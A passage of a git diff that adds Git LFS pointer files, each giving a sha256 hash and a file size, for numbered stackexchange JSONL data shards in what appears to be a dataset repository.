b/data/stackexchange/1-1/1028_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c6444c6ea5d05988f54a9f1660e51998c31115d0a744759338a91507fabd3cd +size 35208519 diff --git a/data/stackexchange/1-1/1029_2289.jsonl b/data/stackexchange/1-1/1029_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcaf3b9b3a42a3738797990216badd1135b39ce9 --- /dev/null +++ b/data/stackexchange/1-1/1029_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19a1a3dcf36b77d3c211f47aee91b9275676caa40c71df8f1a9c2997028a969a +size 34952584 diff --git a/data/stackexchange/1-1/102_2289.jsonl b/data/stackexchange/1-1/102_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a519a3e7195148d68ed534711e067aa40cbde292 --- /dev/null +++ b/data/stackexchange/1-1/102_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df9fe22cb420a3269d423f7f427cbca10c61c8c6846cd81cfb451fcc884a1268 +size 33657694 diff --git a/data/stackexchange/1-1/1030_2289.jsonl b/data/stackexchange/1-1/1030_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a71d57b52f19d77c64233d9e18127e6b696b4aed --- /dev/null +++ b/data/stackexchange/1-1/1030_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb273495992300ddc6e64be95b3b9dedef6676521c3f70256c931b4066142aea +size 35532031 diff --git a/data/stackexchange/1-1/1031_2289.jsonl b/data/stackexchange/1-1/1031_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d7f5f72ccacd1ac816d4208046a277de1d5d06c --- /dev/null +++ b/data/stackexchange/1-1/1031_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b6f76d69f90532411ad3f111ddf7e2b3345fd0d7facee6ba3379ed60ec88d73 +size 35150643 diff --git a/data/stackexchange/1-1/1032_2289.jsonl b/data/stackexchange/1-1/1032_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e12dbd6c693ec0c2fefd782d181c40a4d36d7e6b --- /dev/null +++ b/data/stackexchange/1-1/1032_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:269e1aee0142a563182969724be2b9aa21fba0dc3672eedddc4593b666f8d46c +size 34934648 diff --git a/data/stackexchange/1-1/1033_2289.jsonl b/data/stackexchange/1-1/1033_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2135bdde427ff4d7cad1f33d82c29323d46d79c0 --- /dev/null +++ b/data/stackexchange/1-1/1033_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62d6ebaeb97c6499ff3cb5d44b3d987edffa5ceead290283265cda08b3d1c508 +size 35138645 diff --git a/data/stackexchange/1-1/1034_2289.jsonl b/data/stackexchange/1-1/1034_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c521667712a8b2f2cd785880000d320564c29171 --- /dev/null +++ b/data/stackexchange/1-1/1034_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b23b39bb0ee58324b10aa32a3b019b184e786214d89734c532d347c8053290e +size 35099056 diff --git a/data/stackexchange/1-1/1035_2289.jsonl b/data/stackexchange/1-1/1035_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..48fac43748557b26648ef096f7db1af992231c0a --- /dev/null +++ b/data/stackexchange/1-1/1035_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a00ef5b709b3ff851c4fd6168d28de0090924adb7d19dc84c9b317f96499583d +size 34954239 diff --git a/data/stackexchange/1-1/1036_2289.jsonl b/data/stackexchange/1-1/1036_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6eca7c3d3b0e82ccd51445e3783c3cd7485c91e3 --- /dev/null +++ b/data/stackexchange/1-1/1036_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e619a8bbaf2a9b17e282ee4abcea40b5895af05e7f0b2043d931ebb180e857ad +size 35654447 diff --git a/data/stackexchange/1-1/1037_2289.jsonl b/data/stackexchange/1-1/1037_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..077c12e32b6d1b26448c401be78df0206e9dc6e2 --- /dev/null +++ b/data/stackexchange/1-1/1037_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6c331e6b51d255b725f198ef196e306471a6c22306319b616945d5c9564bbe9 +size 34813728 diff --git a/data/stackexchange/1-1/1038_2289.jsonl b/data/stackexchange/1-1/1038_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8622486e2864dcdbea00f79803083d294c3820ad --- /dev/null +++ b/data/stackexchange/1-1/1038_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c39d2012da6b40c659b913a723b38494759c3638a94949a0747d599be345f67 +size 35200091 diff --git a/data/stackexchange/1-1/1039_2289.jsonl b/data/stackexchange/1-1/1039_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b550b013429ed7dabf933a397eac90f13689efec --- /dev/null +++ b/data/stackexchange/1-1/1039_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:574791d6fbc036025196b55b2b9cc691961144bb9b25e751788ba7ce667302e7 +size 35773132 diff --git a/data/stackexchange/1-1/103_2289.jsonl b/data/stackexchange/1-1/103_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c096c88983aa9eba9537d8f029d408d1426e6605 --- /dev/null +++ b/data/stackexchange/1-1/103_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:397b2c44ece5d0af68a59402f03517d483ce9cb224a8407ac229c29ceb3c53e1 +size 34079466 diff --git a/data/stackexchange/1-1/1040_2289.jsonl b/data/stackexchange/1-1/1040_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a81e71a8f2145c39320aaf96cd9e0a5ca1d776a1 --- /dev/null +++ b/data/stackexchange/1-1/1040_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6c4d8eb8301c460964e706c951cfd8f84f9473c55b401a096069ffb6fbf4ba6 +size 34853128 diff --git a/data/stackexchange/1-1/1041_2289.jsonl b/data/stackexchange/1-1/1041_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ff076c0d667129d723bc8147d73ae6f3d6e7fe79 --- /dev/null +++ b/data/stackexchange/1-1/1041_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19f61478c288c1324ba1b1275d451750d34cbbf02e49b52593a913cb0dbe8bcf +size 35053678 diff --git a/data/stackexchange/1-1/1042_2289.jsonl b/data/stackexchange/1-1/1042_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5aced532454b32d0a0d44d9f9108c00c10c89ad9 --- /dev/null +++ b/data/stackexchange/1-1/1042_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2eb3ef5b359c64c144782141cd6fedd4f82f2c8a074a0a26ea823742e0daf5e +size 35661742 diff --git a/data/stackexchange/1-1/1043_2289.jsonl b/data/stackexchange/1-1/1043_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08b43f201767cece4e24a94a3d271f2f229d63f3 --- /dev/null +++ b/data/stackexchange/1-1/1043_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f01fca7b6b159eede65c3f447cec538adf67418547005f6fae8cc950674d9ef +size 35176925 diff --git a/data/stackexchange/1-1/1044_2289.jsonl b/data/stackexchange/1-1/1044_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3c41fe66de9bb4512a27a5311d26096f015d578 --- /dev/null +++ b/data/stackexchange/1-1/1044_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4e39ad945fb3fb12c81f789fd93c9e5d595d55cbe4f184b4cdf65a294ed97175 +size 35111989 diff --git a/data/stackexchange/1-1/1045_2289.jsonl b/data/stackexchange/1-1/1045_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a70a9559538ff3d845f4559450622c16f258c06 --- /dev/null +++ b/data/stackexchange/1-1/1045_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcbba44cce5ba0bf8987e31abbc107f7a9d880fe2392d7dcd38e825136e5f9d8 +size 35180869 diff --git a/data/stackexchange/1-1/1046_2289.jsonl b/data/stackexchange/1-1/1046_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb7ac3737d5ad362008634a855cdb71bcb7998d2 --- /dev/null +++ b/data/stackexchange/1-1/1046_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59a599adbcda299613140a98902f1dbb8dc1b775f02f86da5347cd0b61a21ad2 +size 34833656 diff --git a/data/stackexchange/1-1/1047_2289.jsonl b/data/stackexchange/1-1/1047_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8af56bf7618e9bb241e7ff2df7c55ebf6ead5122 --- /dev/null +++ b/data/stackexchange/1-1/1047_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e4d17d789afd559f92f0693bfb06538526049f05b5404ce2e5221aa09f491db +size 35309291 diff --git a/data/stackexchange/1-1/1048_2289.jsonl b/data/stackexchange/1-1/1048_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfe8414d4927f7d44a2a85ce5ff47499844bd411 --- /dev/null +++ b/data/stackexchange/1-1/1048_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c1df16e43ec698ee9698a239224d31a1588d48c9c5eeb8861eb8bd6cdcd82a5 +size 35254623 diff --git a/data/stackexchange/1-1/1049_2289.jsonl b/data/stackexchange/1-1/1049_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8fd1881e557473dadd14b389a3f11ae8abafcd7c --- /dev/null +++ b/data/stackexchange/1-1/1049_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7252dfab66b7b2bbb1c97f347ebcfa53ed96f2e2d926fb67073e5171b8ddc67b +size 35098547 diff --git a/data/stackexchange/1-1/104_2289.jsonl b/data/stackexchange/1-1/104_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0701ca7372149933b220933862cda463097d5d74 --- /dev/null +++ b/data/stackexchange/1-1/104_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ff6fe2b36696d4121b6652a53694440093756dc94ea2f3504ef60f79e57d1ee +size 33910563 diff --git a/data/stackexchange/1-1/1050_2289.jsonl b/data/stackexchange/1-1/1050_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f5bc8182bb5915940ddafebb0c943ce7bdb537d --- /dev/null +++ b/data/stackexchange/1-1/1050_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9306ab659ee76824d4de15da470fca22ca010bd46e5506648df5a1826396c0ed +size 38166314 diff --git a/data/stackexchange/1-1/1051_2289.jsonl b/data/stackexchange/1-1/1051_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29af2e2346b6e36f55994c3daeef0564b3e48620 --- /dev/null +++ b/data/stackexchange/1-1/1051_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe971e9e325ea06a8f442652f1f080ffd20d91e84c309de3dc1d1d1750a4c41c +size 37712845 diff --git a/data/stackexchange/1-1/1052_2289.jsonl b/data/stackexchange/1-1/1052_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7210cbe2ad285fdfba9f9ac2aae1f7a4f81dfe7 --- /dev/null +++ b/data/stackexchange/1-1/1052_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5852bbc231338689d2d165d233d614bbe8b21b26b5ca576aeea07110001cdc8a +size 38254874 diff --git a/data/stackexchange/1-1/1053_2289.jsonl b/data/stackexchange/1-1/1053_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69ad9663c199d4d3633a6bf3dd9c0ff665aa8a0b --- /dev/null +++ b/data/stackexchange/1-1/1053_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbea0b43f35e52615f98eaf3b037a9794102903e75626bc193932f9bc140f086 +size 38809630 diff --git a/data/stackexchange/1-1/1054_2289.jsonl b/data/stackexchange/1-1/1054_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ebdf386003e240b1dac7eff3ec3eb1ad353e44 --- /dev/null +++ b/data/stackexchange/1-1/1054_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66e6efb8b58d894322c790ae61fe247eee8cd0c155edf0faefa73d413d2ba8ee +size 37914487 diff --git a/data/stackexchange/1-1/1055_2289.jsonl b/data/stackexchange/1-1/1055_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ae8a79837c3386d380cd36d0de48ee2e880949d --- /dev/null +++ b/data/stackexchange/1-1/1055_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c115d7f5448d376db741184c2373e820bdb685e7f3ba37114c7b6a868f871441 +size 38035994 diff --git a/data/stackexchange/1-1/1056_2289.jsonl b/data/stackexchange/1-1/1056_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cca7f45eb57a0448222abde7901f3bf0d37db54e --- /dev/null +++ b/data/stackexchange/1-1/1056_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b6049e786815dcbd8b785927feaf205ad8edd6f011970f6af5afaab999fca3b +size 37451840 diff --git a/data/stackexchange/1-1/1057_2289.jsonl b/data/stackexchange/1-1/1057_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4910d8bf1b550fd48d1c0ae38e01d12d7674dc9f --- /dev/null +++ b/data/stackexchange/1-1/1057_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a048ffc6108c0858d8acb72c4cf11e3ca0aad511ee27c5c846adb595aecdd1fa +size 38568306 diff --git a/data/stackexchange/1-1/1058_2289.jsonl b/data/stackexchange/1-1/1058_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..142b315eec1986a1a801c352debb8f0e66779a8b --- /dev/null +++ b/data/stackexchange/1-1/1058_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f66424a74634c699470f197ac8ee0b4bcdbaebb5ed85e1988a8874400b97113f +size 37852221 diff --git a/data/stackexchange/1-1/1059_2289.jsonl b/data/stackexchange/1-1/1059_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f1836dc53e8c761565488bcadce742274ab8acc --- /dev/null +++ b/data/stackexchange/1-1/1059_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c605dbcf9c4fb7d2933a7272616cf4b000e63a39cd80c4874ebb72766c22bab +size 37936798 diff --git a/data/stackexchange/1-1/105_2289.jsonl b/data/stackexchange/1-1/105_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3615cee92c4e92db34e9a7e24364c50e5fe66d17 --- /dev/null +++ b/data/stackexchange/1-1/105_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:60dfd696f920d6cb897210620039ea7b5ae36d179ecea212b7cf8b9d6f38f9bc +size 33556922 diff --git a/data/stackexchange/1-1/1060_2289.jsonl b/data/stackexchange/1-1/1060_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..819cee6fb6748c2c705b25626f5c61f8d947d3c8 --- /dev/null +++ b/data/stackexchange/1-1/1060_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba63305d9046f5d6a9a20f1d34abf04a0b0a59b0eed7335af47ad09032fc739b +size 38451666 diff --git a/data/stackexchange/1-1/1061_2289.jsonl b/data/stackexchange/1-1/1061_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a5b6d0797e59b88fee400f563813cb355511848 --- /dev/null +++ b/data/stackexchange/1-1/1061_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5dcc4b5a20954922566a8e2b70ba2dd289970df5f21172a1dcefe1c9d3f1a17 +size 38507253 diff --git a/data/stackexchange/1-1/1062_2289.jsonl b/data/stackexchange/1-1/1062_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..184bc10934abb6c847fea25b4676001455a35d21 --- /dev/null +++ b/data/stackexchange/1-1/1062_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:813609f14507561bb56df06b4211ae1d6152256ae0caabd36df42299cae1bfce +size 37881163 diff --git a/data/stackexchange/1-1/1063_2289.jsonl b/data/stackexchange/1-1/1063_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..191fcfebcf96f2fffca06c1d455567d309f5620e --- /dev/null +++ b/data/stackexchange/1-1/1063_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:365a712fc11b3c9849fa65a1a558d6f8c003ff22a14c562cc78cae9fa581f716 +size 37750108 diff --git a/data/stackexchange/1-1/1064_2289.jsonl b/data/stackexchange/1-1/1064_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dad08886953b26659fb0ee40105a7365fcb682f3 --- /dev/null +++ b/data/stackexchange/1-1/1064_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af47ba4deae178789843fddec7efa005d80dd2f24a3f0ead0d61973643574df4 +size 37760441 diff --git a/data/stackexchange/1-1/1065_2289.jsonl b/data/stackexchange/1-1/1065_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2c6c9cd3b593791bd50193fe0da9cd01f8c1955 --- /dev/null +++ b/data/stackexchange/1-1/1065_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71d7e8d00c2a0cbccaed83bf5b24ea244bd37bbf854d1ee7cd3d97df455a2e45 +size 37408442 diff --git a/data/stackexchange/1-1/1066_2289.jsonl b/data/stackexchange/1-1/1066_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7f935ddf7b7b2834a7831a672607130c1c2c831 --- /dev/null +++ b/data/stackexchange/1-1/1066_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1309ab71805751ce67678b1bf106423b22dfd173aaefcb0ca59704469bf0cfc6 +size 38664448 diff --git a/data/stackexchange/1-1/1067_2289.jsonl b/data/stackexchange/1-1/1067_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd3b5928348fe1c1a9407ddf9c92bf20fa5f2f43 --- /dev/null +++ b/data/stackexchange/1-1/1067_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a5b754c7064730ec67936e3b1e21828ea09f7ff5ee2a79774dd8952fb8bbba6 +size 37768588 diff --git a/data/stackexchange/1-1/1068_2289.jsonl b/data/stackexchange/1-1/1068_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ecb11702a8acfe5e133b3e54105b679449f9bb1 --- /dev/null +++ b/data/stackexchange/1-1/1068_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ce8d26ab48d9651d472bea01c1274257c32195866563c671566192857cdbfde +size 37514758 diff --git a/data/stackexchange/1-1/1069_2289.jsonl b/data/stackexchange/1-1/1069_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0b1c01c90a04fd496cff10441fac21fbd742dc4c --- /dev/null +++ b/data/stackexchange/1-1/1069_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ce20a73ad6d4dd8cb3916500ed44c4e84a1bf40fe13799e3129d8fc0520311e +size 38065902 diff --git a/data/stackexchange/1-1/106_2289.jsonl b/data/stackexchange/1-1/106_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..880f5612a6199c18c87dc6d972bc2dd05cfb5528 --- /dev/null +++ b/data/stackexchange/1-1/106_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b2e04b58e5ecd960220a49a7ec88ba826431d821ac3985002287fcc66ac7cde +size 34124473 diff --git a/data/stackexchange/1-1/1070_2289.jsonl b/data/stackexchange/1-1/1070_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..949e992fbf1ab159be14f9f1b16da26cee311c84 --- /dev/null +++ b/data/stackexchange/1-1/1070_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ec0de66a37a76c741532c576770709aa6ded0e8607c4efa7f953c4b761a6a7a +size 38200860 diff --git a/data/stackexchange/1-1/1071_2289.jsonl b/data/stackexchange/1-1/1071_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b73abd69acec06791d8645e6c2c1de986a723849 --- /dev/null +++ b/data/stackexchange/1-1/1071_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:270c49e8b80f7db15dc168d4e6383d206eb4b39a69f3d9fe2c96838623483ca1 +size 37849154 diff --git a/data/stackexchange/1-1/1072_2289.jsonl b/data/stackexchange/1-1/1072_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7eb351fc74ca86e40104e5b6f81840d21144a4df --- /dev/null +++ b/data/stackexchange/1-1/1072_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac0d463c8bb02724e6a7d12062bd4df29d0c190baa879956904b0ca54e1a4e6b +size 38090538 diff --git a/data/stackexchange/1-1/1073_2289.jsonl b/data/stackexchange/1-1/1073_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f1ac3fbddcd05fd93c832d78eac0224f20d148c4 --- /dev/null +++ b/data/stackexchange/1-1/1073_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0a0d152186d4c1d4101fee53da52fa2461c6a6cb9719abd9d1141b8f1c5793d +size 37873255 diff --git a/data/stackexchange/1-1/1074_2289.jsonl b/data/stackexchange/1-1/1074_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1273308bd1e3803e3aef45f8498a01f86799178d --- /dev/null +++ b/data/stackexchange/1-1/1074_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c4ee55ca1deb65fac1bbe09df29309eed5e6dfe56170da1a8a61d4cab0a697e +size 38336733 diff --git a/data/stackexchange/1-1/1075_2289.jsonl b/data/stackexchange/1-1/1075_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7f43624f73762ce3c52d3a654c502359b302182b --- /dev/null +++ b/data/stackexchange/1-1/1075_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39ca84e88a819177dbdddaca09aa2934bbf092fae34d0b35a5d5d787234b215c +size 38402649 diff --git a/data/stackexchange/1-1/1076_2289.jsonl b/data/stackexchange/1-1/1076_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83e6992214913c285c91d5188225ae19fa51291b --- /dev/null +++ b/data/stackexchange/1-1/1076_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb1ff6ab231cfd77e232e13bc4ae13f091789783f542a4f4a2de270bbb117c11 +size 37985820 diff --git a/data/stackexchange/1-1/1077_2289.jsonl b/data/stackexchange/1-1/1077_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca904d210802c52478f0e7bdd0668a5fddf44d13 --- /dev/null +++ b/data/stackexchange/1-1/1077_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42b3f11f032c1b66e5855cf5f2c658ebfa8a18b0a6fd73c8a0fde3c8ea674de9 +size 37319391 diff --git a/data/stackexchange/1-1/1078_2289.jsonl b/data/stackexchange/1-1/1078_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4cac0ee4cfd9e7dfc1280ab6466e65b806dae5c8 --- /dev/null +++ b/data/stackexchange/1-1/1078_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fc1eb5d15938c75aee695f81c2bbd296e1dff8a358193e3c21e3904573d5700 +size 37931604 diff --git a/data/stackexchange/1-1/1079_2289.jsonl b/data/stackexchange/1-1/1079_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b7003f6f4508560fdeab173f320ec06f2fd0974 --- /dev/null +++ b/data/stackexchange/1-1/1079_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d6cea9f648559feb9bfe5b006820e62259e1b5f70b637b8a7c31444fb94c8a2 +size 38092648 diff --git a/data/stackexchange/1-1/107_2289.jsonl b/data/stackexchange/1-1/107_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3201e2e3f7620008639d84515acc8f2920f5e911 --- /dev/null +++ b/data/stackexchange/1-1/107_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:449d3f0f6178d2ff145b292e199d2aa337b196e1a05312c7cbfed08bebb853b7 +size 33409016 diff --git a/data/stackexchange/1-1/1080_2289.jsonl b/data/stackexchange/1-1/1080_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eac993bb9f6801e26a2578a18d40ffb852f981e3 --- /dev/null +++ b/data/stackexchange/1-1/1080_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b620f89d47bf8e9291febf2384a3939f7fbd991e12765dfc915cafb49935d117 +size 37540111 diff --git a/data/stackexchange/1-1/1081_2289.jsonl b/data/stackexchange/1-1/1081_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1eb477fa3db45b6575dc80f146695422559f210d --- /dev/null +++ b/data/stackexchange/1-1/1081_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c815ac104b93da0cb1df265551a6acd8773c118759d0d1bef0f91880358d536b +size 38121864 diff --git a/data/stackexchange/1-1/1082_2289.jsonl b/data/stackexchange/1-1/1082_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71747ad9c639f672527dfa7691e1089f719ea2ab --- /dev/null +++ b/data/stackexchange/1-1/1082_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:174bcbca37623ae8254cd9942b16a142bd2b9bac9dc989d901bc5fd96f63bd23 +size 38365793 diff --git a/data/stackexchange/1-1/1083_2289.jsonl b/data/stackexchange/1-1/1083_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..edc69013c7af48a4f92b2b72585fc8c845b7eb58 --- /dev/null +++ b/data/stackexchange/1-1/1083_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a68c0e5197ad0b6f001f0634ee304334500f07c63e8e3ed4c80656563ac2b3b7 +size 37597737 diff --git a/data/stackexchange/1-1/1084_2289.jsonl b/data/stackexchange/1-1/1084_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6fd1c6e584eb11c26566210c3199f7ddfdf81d8 --- /dev/null +++ b/data/stackexchange/1-1/1084_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:999d8f7ddaf0895bf8d1fdbe7af6534206dfb25b35c40d43bf31ebf5be249685 +size 38505555 diff --git a/data/stackexchange/1-1/1085_2289.jsonl b/data/stackexchange/1-1/1085_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4cd7ca0a8748fa21758bdb088755796450e527bf --- /dev/null +++ b/data/stackexchange/1-1/1085_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f46f6e2f141dd638704672663601ab4fe6124120c9e78572f698f2b4b835bc3 +size 37818147 diff --git a/data/stackexchange/1-1/1086_2289.jsonl b/data/stackexchange/1-1/1086_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf917e1ae26ebd25747d24ef627f34fa9c6e65e3 --- /dev/null +++ b/data/stackexchange/1-1/1086_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3d2efb08caee4f2e2784c92ab93582696fe66ab1ad177bc130600468e124d3a +size 38021122 diff --git a/data/stackexchange/1-1/1087_2289.jsonl b/data/stackexchange/1-1/1087_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f9ee99325f8a6133473c8086b34aa01d7d269975 --- /dev/null +++ b/data/stackexchange/1-1/1087_2289.jsonl @@ -0,0 +1,3 @@ +version 